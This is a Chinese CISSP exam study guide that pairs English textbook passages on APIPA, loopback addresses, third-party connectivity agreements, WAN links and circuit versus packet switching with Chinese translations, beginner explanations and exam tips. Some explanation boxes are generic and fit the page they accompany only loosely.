常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 891 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
标准 标准给出必须满足的最低要求。
学习单元 55 / PDF P892

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

APIPA is not usually directly concerned with security. However, it is still an important issue to understand. If you notice that a system is assigned an APIPA address instead of a valid network address, that indicates a problem. It could be as mundane as a bad cable or power failure on the DHCP server, but it could also be a symptom of a malicious attack on the DHCP server. You might be asked to decipher issues in a scenario where IP addresses are presented. You should be able to discern whether an address is a public address, an RFC 1918 private address, an APIPA address, or a loopback address (see Chapter 11).

The Loopback Address Another IP address range that you should be careful not to confuse with the private IP address ranges defined in RFC 1918 is the loopback address. The loopback address is purely a software entity. It is an IP address used to create a software interface that connects back to itself via TCP/IP. The loopback address allows for the testing of local network settings in spite of missing, damaged, or nonfunctional network hardware and related device drivers. Technically, the entire 127.x.x.x network is reserved for loopback use. However, only the 127.0.0.1 address is widely used. Third-Party Connectivity Third-party connectivity is a growing concern for almost every business.

Very few organizations operate exclusively using internal resources—most organizations interact with outside third-party providers. Most of these external entities do not need to interact directly with an organization's IT/IS. However, for those few that do, it is important to consider the risks and ramifications. Any time an organizational network is connected directly to another entity's network, their local threats and risks affect each other. A compromise of one organization can lead easily to the compromise of the other. Any connection between IT environments should be planned out in detail well in advance of actually interconnecting the cabling (whether physical or virtual).

Often, this process starts with an MOU and ends with an ISA: APIPA

中文直译 / 整理

通常不直接涉及安全性。 然而,理解这一点仍然很重要。 如果你发现系 统被分配了一个APIPA地址而非有效的网络地址,这表明存在问题。 问题可能 很简单,比如网线损坏或DHCP服务器断电,但也可能是对DHCP服务器的恶 意攻击的征兆。 在某些场景中,你可能需要根据提供的IP地址来分析问题。 你 应该能够区分某个地址是公有地址、RFC 1918私有地址、APIPA地址还是环回 地址(参见第11章)。 回环地址 另一个您应小心不要与 RFC 1918 中定义的私有 IP 地址范围混淆的 IP 地址 范围是回环地址。 回环地址纯粹是一种软件实体,它是一个用于创建通过 TCP/IP 连接回自身的软件接口的 IP 地址。 回环地址允许在缺少、损坏或 网络硬件及相关设备驱动程序无法正常工作的情况下,测试本地网络设置。 从技术上讲,整个 127.x.x.x 网络都保留用于回环用途。 然而,只有 127.0.0.1 地址被广泛使用。 第三方连接 第三方连接是几乎所有企业日益关注的问题。 很少有组织完全依赖内部资源—— 大多数组织都会与外部第三方供应商互动。 这些外部实体中的大多数无需直接 与组织的 IT/IS 系统交互。

然而,对于那些确实需要交互的少数实体,考虑其 风险和影响至关重要。 每当组织网络直接连接到另一实体的网络时,双方的本 地威胁和风险都会相互影响。 一个组织的被入侵很容易导致另一个组织也被入 侵。 IT环境之间的任何连接都应在实际布线(无论是物理还是虚拟)之前详细规 划。 这一过程通常从备忘录开始,以安全协议结束:

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

TCP/IP 模型:TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

考试常让你把协议、端口、层次对应起来。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
TCP/IP 模型 TCP/IP 是现实网络常用协议栈,和 OSI 可对应理解。
学习单元 56 / PDF P893

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

A memorandum of understanding (MOU) or memorandum of agreement (MOA) is an expression of agreement or aligned intent, will, or purpose between two entities. It is not typically a legal agreement or commitment, but rather a more formal form of a reciprocal agreement or handshake (neither of which is typically written down). An MOU can also be called a letter of intent. It is a means to document the specifics of an agreement or arrangement between two parties without necessarily legally binding them to the parameters of the document.

An interconnection security agreement (ISA) is a formal declaration of the security stance, risks, and technical requirements of a link between two organizations' IT infrastructures. The goal of an ISA is to define the expectations and responsibilities of maintaining security over a communications path between two networks. Connecting networks can be mutually beneficial, but it also raises additional risks that need to be identified and addressed. An ISA is a means to accomplish that. Additionally, a full risk assessment should be performed in order to predict issues and preemptively protect against adverse events as much as possible.

Keep in mind that direct linking of IT environments is not the only possible solution in most circumstances. Using an extranet to host servers to be accessed by the other party via a VPN is a reasonable alternative. Another option is to work with a cloud solution to establish a shared private cloud between the two entities so that only project-related content is ever shared between the two parties. A third option is to keep all datasets separate and use secure email, file sharing, and multimedia collaboration services.

Whatever approach you decide to use, don't let the rush or haste of establishing a new relationship with a third party or engaging in a new project cause security to be discarded or overlooked. Similar care should be taken when electing to use a cloud service, since they are third parties. As an organization adopts cloud services, from SaaS to IaaS, the level of connectivity and direct interaction with on-premises equipment increases. Clear security guidelines and policies should be established, and when possible, technologies such as cloud access security brokers (CASBs) should be deployed to enforce those security requirements.

Yet another possible interpretation of third-party connectivity is a remote worker or telecommuter. As mentioned previously, there needs to be clear justification for allowing remote work, which requires a direct link or access

中文直译 / 整理

谅解备忘录(MOU)或协议备忘录(MOA)是两个实体之间表达共识、 意向或目的的文件。 它通常不是具有法律效力的协议或承诺,而是一种更 为正式的互惠协议或握手形式(后者通常不以书面形式记录)。 MOU也可 称为意向书,其作用是记录双方协议或安排的具体内容,而无需在法律上 将双方约束于文件的条款中。 一个互联安全协议(ISA)是对两个组织IT基础设施之间链接的安全立场、 风险和技术要求的正式声明。 ISA的目标是明确在两个网络之间的通信路 径上维护安全的期望与责任。 连接网络可能带来互利,但也增加了需要 识别和应对的额外风险。 ISA正是实现这一目标的手段。 此外,应进行全面的风险评估,以预测问题并尽可能提前防范不利事件。 请记住,在大多数情况下,直接连接IT环境并非唯一可能的解决方案。 使用 外部网络托管服务器,供另一方通过VPN访问,是一种合理的替代方案。 另 一种选择是采用云解决方案,在双方之间建立一个共享的私有云,以便仅共 享与项目相关的内容。 第三种选择是保持所有数据集独立,使用安全电子邮 件、文件共享和多媒体协作服务。 无论您决定采用何种方法,都不要因为急于与第三方建立新关系或开展新项目 而忽视或放弃安全性。

在选择使用云服务时也应采取类似的谨慎态度,因为云服务提供商属于第三方。 随着组织逐步采用从SaaS到IaaS的云服务,与本地设备的连接性和直接交互程 度不断提高。 应制定明确的安全指南和政策,并在可能的情况下部署云访问安 全代理(CASB)等技术,以落实这些安全要求。 第三方连接的另一种可能解释是远程工作者或远程办公人员。 如前所述,允 许远程工作需要有明确的理由,并且需要建立直接连接或访问

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

政策:政策是高层原则,说明必须遵守什么。

指南:指南是建议做法,不一定强制。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

Policy 高层、强制、稳定;Procedure 具体步骤。

Recommended、not compulsory 常对应 guideline。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
政策 政策是高层原则,说明必须遵守什么。
指南 指南是建议做法,不一定强制。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 57 / PDF P894

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

to internal resources. When possible, limit telecommuters to extranet servers or only publicly facing systems (such as email and websites). It may also be important to provide company-owned and -controlled equipment to remote workers rather than depending on personal equipment, which may not be securable or may be used for nonwork purposes or by nonemployees. Third-party connectivity is a risk that can be managed, but it requires focused and purposed attention. Remember that any means of data transmission or communication can be employed by benign actors for legitimate purposes as well as by adversaries for malicious purposes.

WAN technologies are critical for establishing connectivity over large geographical areas. In the context of third-party connectivity involving telecom providers and hardware support, several key considerations come into play. Telecom providers play a central role in WAN connectivity, offering services like leased lines, Multiprotocol Label Switching (MPLS), and virtual private network (VPN) services. Leased lines provide dedicated point-to-point connections, whereas MPLS and VPN services enable secure and efficient data transmission over shared infrastructure.

Hardware support is equally vital in WAN connectivity, involving components such as routers, switches, and WAN optimization appliances. These devices are essential for establishing and managing WAN connections. Hardware support ensures proper functioning, maintenance, and troubleshooting, either through internal IT teams or third-party vendors specializing in networking hardware. MPLS services are commonly employed in WAN connectivity, providing businesses with the means to create private and secure networks across multiple locations. MPLS incorporates quality of service (QoS) features, addressing specific performance requirements.

With the rise of cloud services, WAN technologies play a pivotal role in connecting organizations to cloud providers. Telecom providers offer solutions facilitating direct connections to major cloud platforms, enhancing performance, security, and reliability for cloud-based applications. Software-defined WAN (SD-WAN) is a modern approach to WAN connectivity that utilizes software-defined networking principles. It allows organizations to dynamically route traffic over various connections, optimizing performance and cost-effectiveness. Telecom providers may offer SD-WAN services to enhance network flexibility and efficiency.

中文直译 / 整理

内部资源。 在可能的情况下,应将远程办公人员的访问权限限制在外部服务器 或仅面向公众的系统(如电子邮件和网站)上。 此外,向远程工作者提供公司 所有并受公司控制的设备,而非依赖可能无法保障安全或用于非工作目的或由 非员工使用的个人设备,也可能非常重要。 第三方连接是一种可以管理的风险,但需要集中且明确的关注。 请记住,任何 数据传输或通信方式都可能被善意方用于合法目的,也可能被敌对方用于恶意 目的。 广域网技术对于在大地理区域内建立连接至关重要。 在涉及电信运营商和硬件 支持的第三方连接背景下,有几个关键因素需要考虑。 电信运营商在广域网连 接中发挥核心作用,提供专线、多协议标签交换(MPLS)和虚拟专用网络 (VPN)服务。 专线提供专用的点对点连接,而MPLS和VPN服务则可在共享 基础设施上实现安全高效的数传输。 硬件支持在广域网连接中同样至关重要,涉及路由器、交换机和广域网优化设 备等组件。 这些设备对于建立和管理广域网连接至关重要。 硬件支持通过内部 IT团队或专门从事网络硬件的第三方供应商,确保设备的正常运行、维护和故 障排除。

MPLS服务在广域网连接中被广泛采用,为企业提供跨多个地点创建私有且安 全网络的手段。 MPLS集成了服务质量(QoS)功能,以满足特定的性能要求。 随着云服务的兴起,广域网技术在连接组织与云提供商方面发挥着关键作用。 电信运营商提供解决方案,以实现与主要云平台的直接连接,从而提升基于云 的应用程序的性能、安全性和可靠性。 软件定义广域网(SD‑WAN)是一种现代的广域网连接方法,它采用了软件定 义网络的原则。 它允许组织动态地通过多种连接路由流量,以优化性能和成本 效益。 电信提供商可以提供SD‑WAN服务,以增强网络的灵活性和效率。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

程序:程序是一步一步怎么做。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

Step-by-step、SOP 常对应 procedure。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
程序 程序是一步一步怎么做。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 58 / PDF P895

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Redundancy and failover mechanisms are crucial components of WAN technologies to ensure continuous connectivity. This may involve the use of multiple telecom providers or diverse network paths to minimize the risk of service disruption. Hardware support is essential for maintaining and configuring these redundant setups. WAN technologies in the context of third-party connectivity involve collaboration with telecom providers and the utilization of hardware components. Organizations leverage a mix of technologies, including leased lines, MPLS, VPNs, SD-WAN, and others, to establish efficient and reliable connectivity across diverse locations.

Hardware support, whether provided internally or by third-party vendors, is essential for maintaining the integrity and performance of the WAN infrastructure. The choice of WAN technologies and third-party partnerships depends on factors such as performance requirements, cost considerations, and the specific needs of the organization. Switching Technologies When two systems (individual computers or LANs) are connected over multiple intermediary networks, the task of transmitting data from one to the other is a complex process. Switching technologies were developed to simplify this task.

Circuit Switching Circuit switching was originally developed to manage telephone calls over the public switched telephone network. In circuit switching, a dedicated physical pathway is created between the two communicating parties. Once a call is established, the links between the two parties remain the same throughout the conversation. Circuit switching provides for fixed or known transmission times, a uniform level of quality, and little or no loss of signal or communication interruptions. These systems employ permanent, physical connections. However, the term permanent applies only to each communication session. The path is permanent throughout a single conversation.

Once the path is disconnected, if the two parties communicate again, a different path may be assembled. During a single conversation, the same physical or electronic path is used throughout the communication and is used only for that one communication. Circuit switching grants exclusive use of a communication path to the current communication partners. Only

中文直译 / 整理

冗余和故障切换机制是广域网技术中确保持续连接的关键组成部分。 这可能 涉及使用多个电信提供商或不同的网络路径,以最大限度地降低服务中断的 风险。 硬件支持对于维护和配置这些冗余设置至关重要。 在第三方连接的背景下,广域网技术涉及与电信提供商的合作以及硬件组件的 使用。 组织利用多种技术,包括租用线路、MPLS、VPN、SD‑WAN 等,以在 不同地点之间建立高效可靠的连接。 无论是由内部还是第三方供应商提供的硬 件支持,对于维护广域网基础设施的完整性和性能都至关重要。 广域网技术的 选择和第三方合作伙伴关系取决于性能要求、成本考量以及组织的具体需求。 交换技术 当两个系统(单台计算机或局域网)通过多个中间网络连接时,将数据从一个 系统传输到另一个系统的任务是一个复杂的过程。 交换技术正是为简化这一任 务而开发的。 电路交换 电路交换最初是为了管理公共交换电话网络上的电话呼叫而开发的。 在电路交 换中,会在两个通信方之间创建一条专用的物理路径。 一旦建立呼叫,双方之 间的链路在整个对话过程中保持不变。 电路交换提供固定的或已知的传输时间、 统一的质量水平,以及极少或没有信号丢失或通信中断。 这些系统采用永久性 的物理连接。

然而,"永久"一词仅适用于每次通信会话。 路径在单次对话期间 是永久的。 一旦路径断开,如果双方再次通信,可能会组装另一条路径。 在单 次对话期间,整个通信过程使用相同的物理或电子路径,且该路径仅用于该次 通信。 电路交换为当前通信双方提供通信路径的独占使用权。 只有

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

IPS 放在线路中,误报可能影响可用性。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 59 / PDF P896

第 896 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

after a session has been closed can a pathway be reused by another communication. Real-World Circuit Switching There is very little actual circuit switching in the modern world (or at least in the past 20 to 25 years or so). Packet switching, discussed next, has become ubiquitous for data and voice transmissions. Decades ago, we could often point to the public switched telephone network (PSTN) as a prime example of circuit switching, but with the advent of digital switching and VoIP systems, those days are long gone. That's not to say that circuit switching is nonexistent in today's world; it is just not being used for data transmission.

Instead, you can still find circuit switching in rail yards, irrigation systems, and even electrical distribution systems. Packet Switching Eventually, as computer communications increased as opposed to traditional voice communications, a new form of switching was developed. Packet switching occurs when the message or communication is broken up into small segments (fixed-length cell or variable-length packets, depending on the protocols and technologies employed) and sent across the intermediary networks to the destination. Each segment of data has its own header that contains source and destination information.

The header is read by each intermediary system and is used to route each packet to its intended destination. Each channel or communication path is reserved for use only while a packet is actually being transmitted over it. As soon as the packet is sent, the channel is made available for other communications. Packet switching does not enforce the exclusivity of communication pathways. It can be seen as a logical transmission technology because addressing logic dictates how communications traverse intermediary networks between communication partners. Table 12.2 compares circuit switching to packet switching.

中文直译 / 整理

在会话关闭后,该路径才能被其他通信复用。 真实世界的电路交换 在现代世界中(或者至少在过去20到25年左右),实际的电路交换非常罕 见。 接下来将讨论的分组交换已成为数据和语音传输的普遍方式。 几十年 前,我们常常将公共交换电话网络(PSTN)作为电路交换的典型例子,但 随着数字交换和VoIP系统的出现,那样的时代早已一去不复返了。 这并不 意味着电路交换在当今世界已完全消失; 它只是不再用于数据传输。 相反, 你仍然可以在铁路编组场、灌溉系统甚至电力分配系统中找到电路交换的 应用。 分组交换 随着计算机通信逐渐取代传统的语音通信,一种新的交换形式应运而生。 分组 交换是指将消息或通信分解为小段(根据所采用的协议和技术,可以是固定长 度的信元或可变长度的分组),并通过中间网络发送到目的地。 每个数据段都 包含一个头部,其中包含源地址和目的地址信息。 每个中间系统都会读取该头 部,并用它来将每个分组路由到其预定目的地。 每个信道或通信路径仅在实际 传输分组时被保留使用。 一旦分组发送完毕,该信道便立即释放,供其他通信 使用。 分组交换不强制通信路径的独占性。

它可被视为一种逻辑传输技术,因为 寻址逻辑决定了通信如何在通信双方之间的中间网络中传输。 表 12.2比 较了电路交换与分组交换。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 896 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 60 / PDF P897

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

TABLE 12.2 Circuit switching vs. packet switching Circuit switching Packet switching Constant traffic Bursty traffic Fixed known delays Variable delays Connection-oriented Connectionless Sensitive to connection loss Sensitive to data loss Used primarily for voice Used for any type of traffic In relation to security, you should consider a few potential issues. A packetswitching system places data from different sources on the same physical connection. This can lend itself to disclosure, corruption, or eavesdropping. Proper connection management, traffic isolation, and usually encryption are needed to protect against shared physical pathway concerns.

A benefit of packet-switching networks is that they are not as dependent on specific physical connections as circuit switching is. Thus, when or if a physical pathway is damaged or goes offline, an alternate path can be used to continue the data/packet delivery. A circuit-switching network is often interrupted by physical path violations. Virtual Circuits A virtual circuit (also called a communication path) is a logical pathway or circuit created over a packet-switched network between two specific endpoints.

Within packet-switching systems are two types of virtual circuits: Permanent virtual circuits (PVCs) Switched virtual circuits (SVCs) A PVC is like a dedicated leased line; the logical circuit always exists and is waiting for the customer to send data. A PVC is a predefined virtual circuit that is always available. The virtual circuit may be closed down when not in use, but it can be instantly reopened whenever needed. An SVC has to be created each time it is needed using the best paths currently available before it can be used and then disassembled after the transmission is complete.

In either type of virtual circuit, when a data packet enters point A of a virtual circuit connection, that packet is sent directly to point B or the other end of the virtual circuit. However, the actual path of one packet may be different from the path of another packet from the same transmission. In other words,

中文直译 / 整理

表 12.2 电路交换与分组交换 电路交换 分组交换 恒定流量 突发流量 固定已知延迟 可变延迟 面向连接 无连接 对连接丢失敏感 对数据丢失敏感 主要用于语音 用于任何类型的流量 在安全性方面,您应考虑一些潜在问题。 分组交换系统将来自不同源的数据放 置在同一物理连接上。 这可能导致信息泄露、数据篡改或窃听。 为应对共享物 理路径的隐患,需要适当的连接管理、流量隔离以及通常的加密措施。 分组交 换网络的一个优势是,它们不像电路交换那样依赖特定的物理连接。 因此,当 或如果物理路径受损或离线时,可以使用备用路径继续数据/分组的传输。 电路 交换网络通常会因物理路径中断而受到影响。 虚拟电路 一个虚拟电路(也称为通信路径)是在分组交换网络上在两个特定端点之间创 建的逻辑路径或电路。 在分组交换系统中,有两种类型的虚拟电路: 永久虚拟电路(PVC) 交换虚拟电路(SVC) PVC类似于一条专用的租赁线路; 逻辑电路始终存在并等待客户发送数据。 PVC是一种预先定义的虚拟电路,始终可用。 当不使用时,虚拟电路可能会被 关闭,但可以在需要时立即重新打开。 SVC则需要在每次使用前,利用当前可 用的最佳路径创建,传输完成后立即拆除。

无论哪种类型的虚拟电路,当数据 包进入虚拟电路连接的A点时,该数据包将直接发送到B点或虚拟电路的另一 端。 然而,同一传输中一个数据包的实际路径可能与另一个数据包的路径不同。 换句话说,

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 61 / PDF P898

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

multiple paths may exist between point A and point B as the ends of the virtual circuit, but any packet entering at point A will end up at point B. A PVC is like a two-way radio or walkie-talkie. Whenever communication is needed, you press the button and start talking; the radio reopens the predefined frequency automatically (that is, the virtual circuit). An SVC is more like a shortwave or ham radio. You must tune the transmitter and receiver to a new frequency every time you want to communicate with someone. WAN Technologies WAN technologies contribute to the efficiency, scalability, and reliability of long-distance communications.

The selection of a specific technology hinges on factors such as geographical locations, bandwidth requirements, latency sensitivity, and the unique needs of the applications being supported. Each technology plays a role in addressing connectivity challenges across diverse and often remote environments. Wide area network links are used to connect distant networks, nodes, or individual devices together. A WAN link can improve communications and efficiency, but it can also place data at risk. Proper connection management and transmission encryption is needed for a secure connection, especially over public network links.

WAN links and long-distance connection technologies can be divided into two primary categories: dedicated and nondedicated. A dedicated line (also called a leased line or point-to-point link) is one that is continually reserved for use by a specific customer. A dedicated line is always on and waiting for traffic to be transmitted over it. The link between the customer's LAN and the dedicated WAN link is always open and established. A dedicated line connects two specific endpoints and only those two endpoints. This type of connection is often used between multiple business locations, so they can effectively communicate as a single entity.

There have been numerous types of dedicated lines over the years, ranging from the T1 (telephone line 1 with 1.54 Mbps capacity) to DS3 (Digital Service 3 with 44.7 Mbps capacity) (originally known as the T3). Other options included X.25, Asynchronous Transfer Mode (ATM), and Frame Relay. These technologies have mostly been replaced by fiber optic–based solutions.

中文直译 / 整理

在虚拟电路的两端A点和B点之间可能存在多条路径,但任何从A点进入的数 据包最终都会到达B点。 PVC就像对讲机或无线对讲机。 每当需要通信时,您按下按钮即可开始讲话; 无线电会自动重新打开预定义的频率(即虚拟电路)。 SVC则更像短波或业 余无线电。 每次您想与他人通信时,都必须将发射器和接收器调至新的频率。 广域网技术 广域网技术有助于提升远程通信的效率、可扩展性和可靠性。 特定技术的选择 取决于地理位置、带宽需求、延迟敏感性以及所支持应用程序的独特需求。 每 种技术都在应对各种乃至偏远环境中的连接挑战中发挥着作用。 广域网链路用于连接遥远的网络、节点或单个设备。 广域网链路可以改善通 信和效率,但也可能使数据面临风险。 为了确保安全连接,尤其是在公共网 络链路上,需要进行适当的连接管理和传输加密。 广域网链路和远程连接技 术可分为两大类:专用和非专用。 一条专线(也称为租用线路或点对点链接)是专为特定客户持续保留的线路。 专线始终处于开启状态,等待数据通过其传输。 客户局域网与专用广域网链路 之间的连接始终保持开放和建立。 专线仅连接两个特定端点,且仅限这两个端 点。

这种连接通常用于多个业务地点之间,以便它们能够有效地作为一个整体 进行通信。 多年来,出现了多种专用线路,从T1(电话线1,容量为1.54 Mbps)到DS3 (数字服务3,容量为44.7 Mbps)(最初称为T3)。 其他选项包括X.25、异 步传输模式(ATM)和帧中继。 这些技术大多已被基于光纤的解决方案取代。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

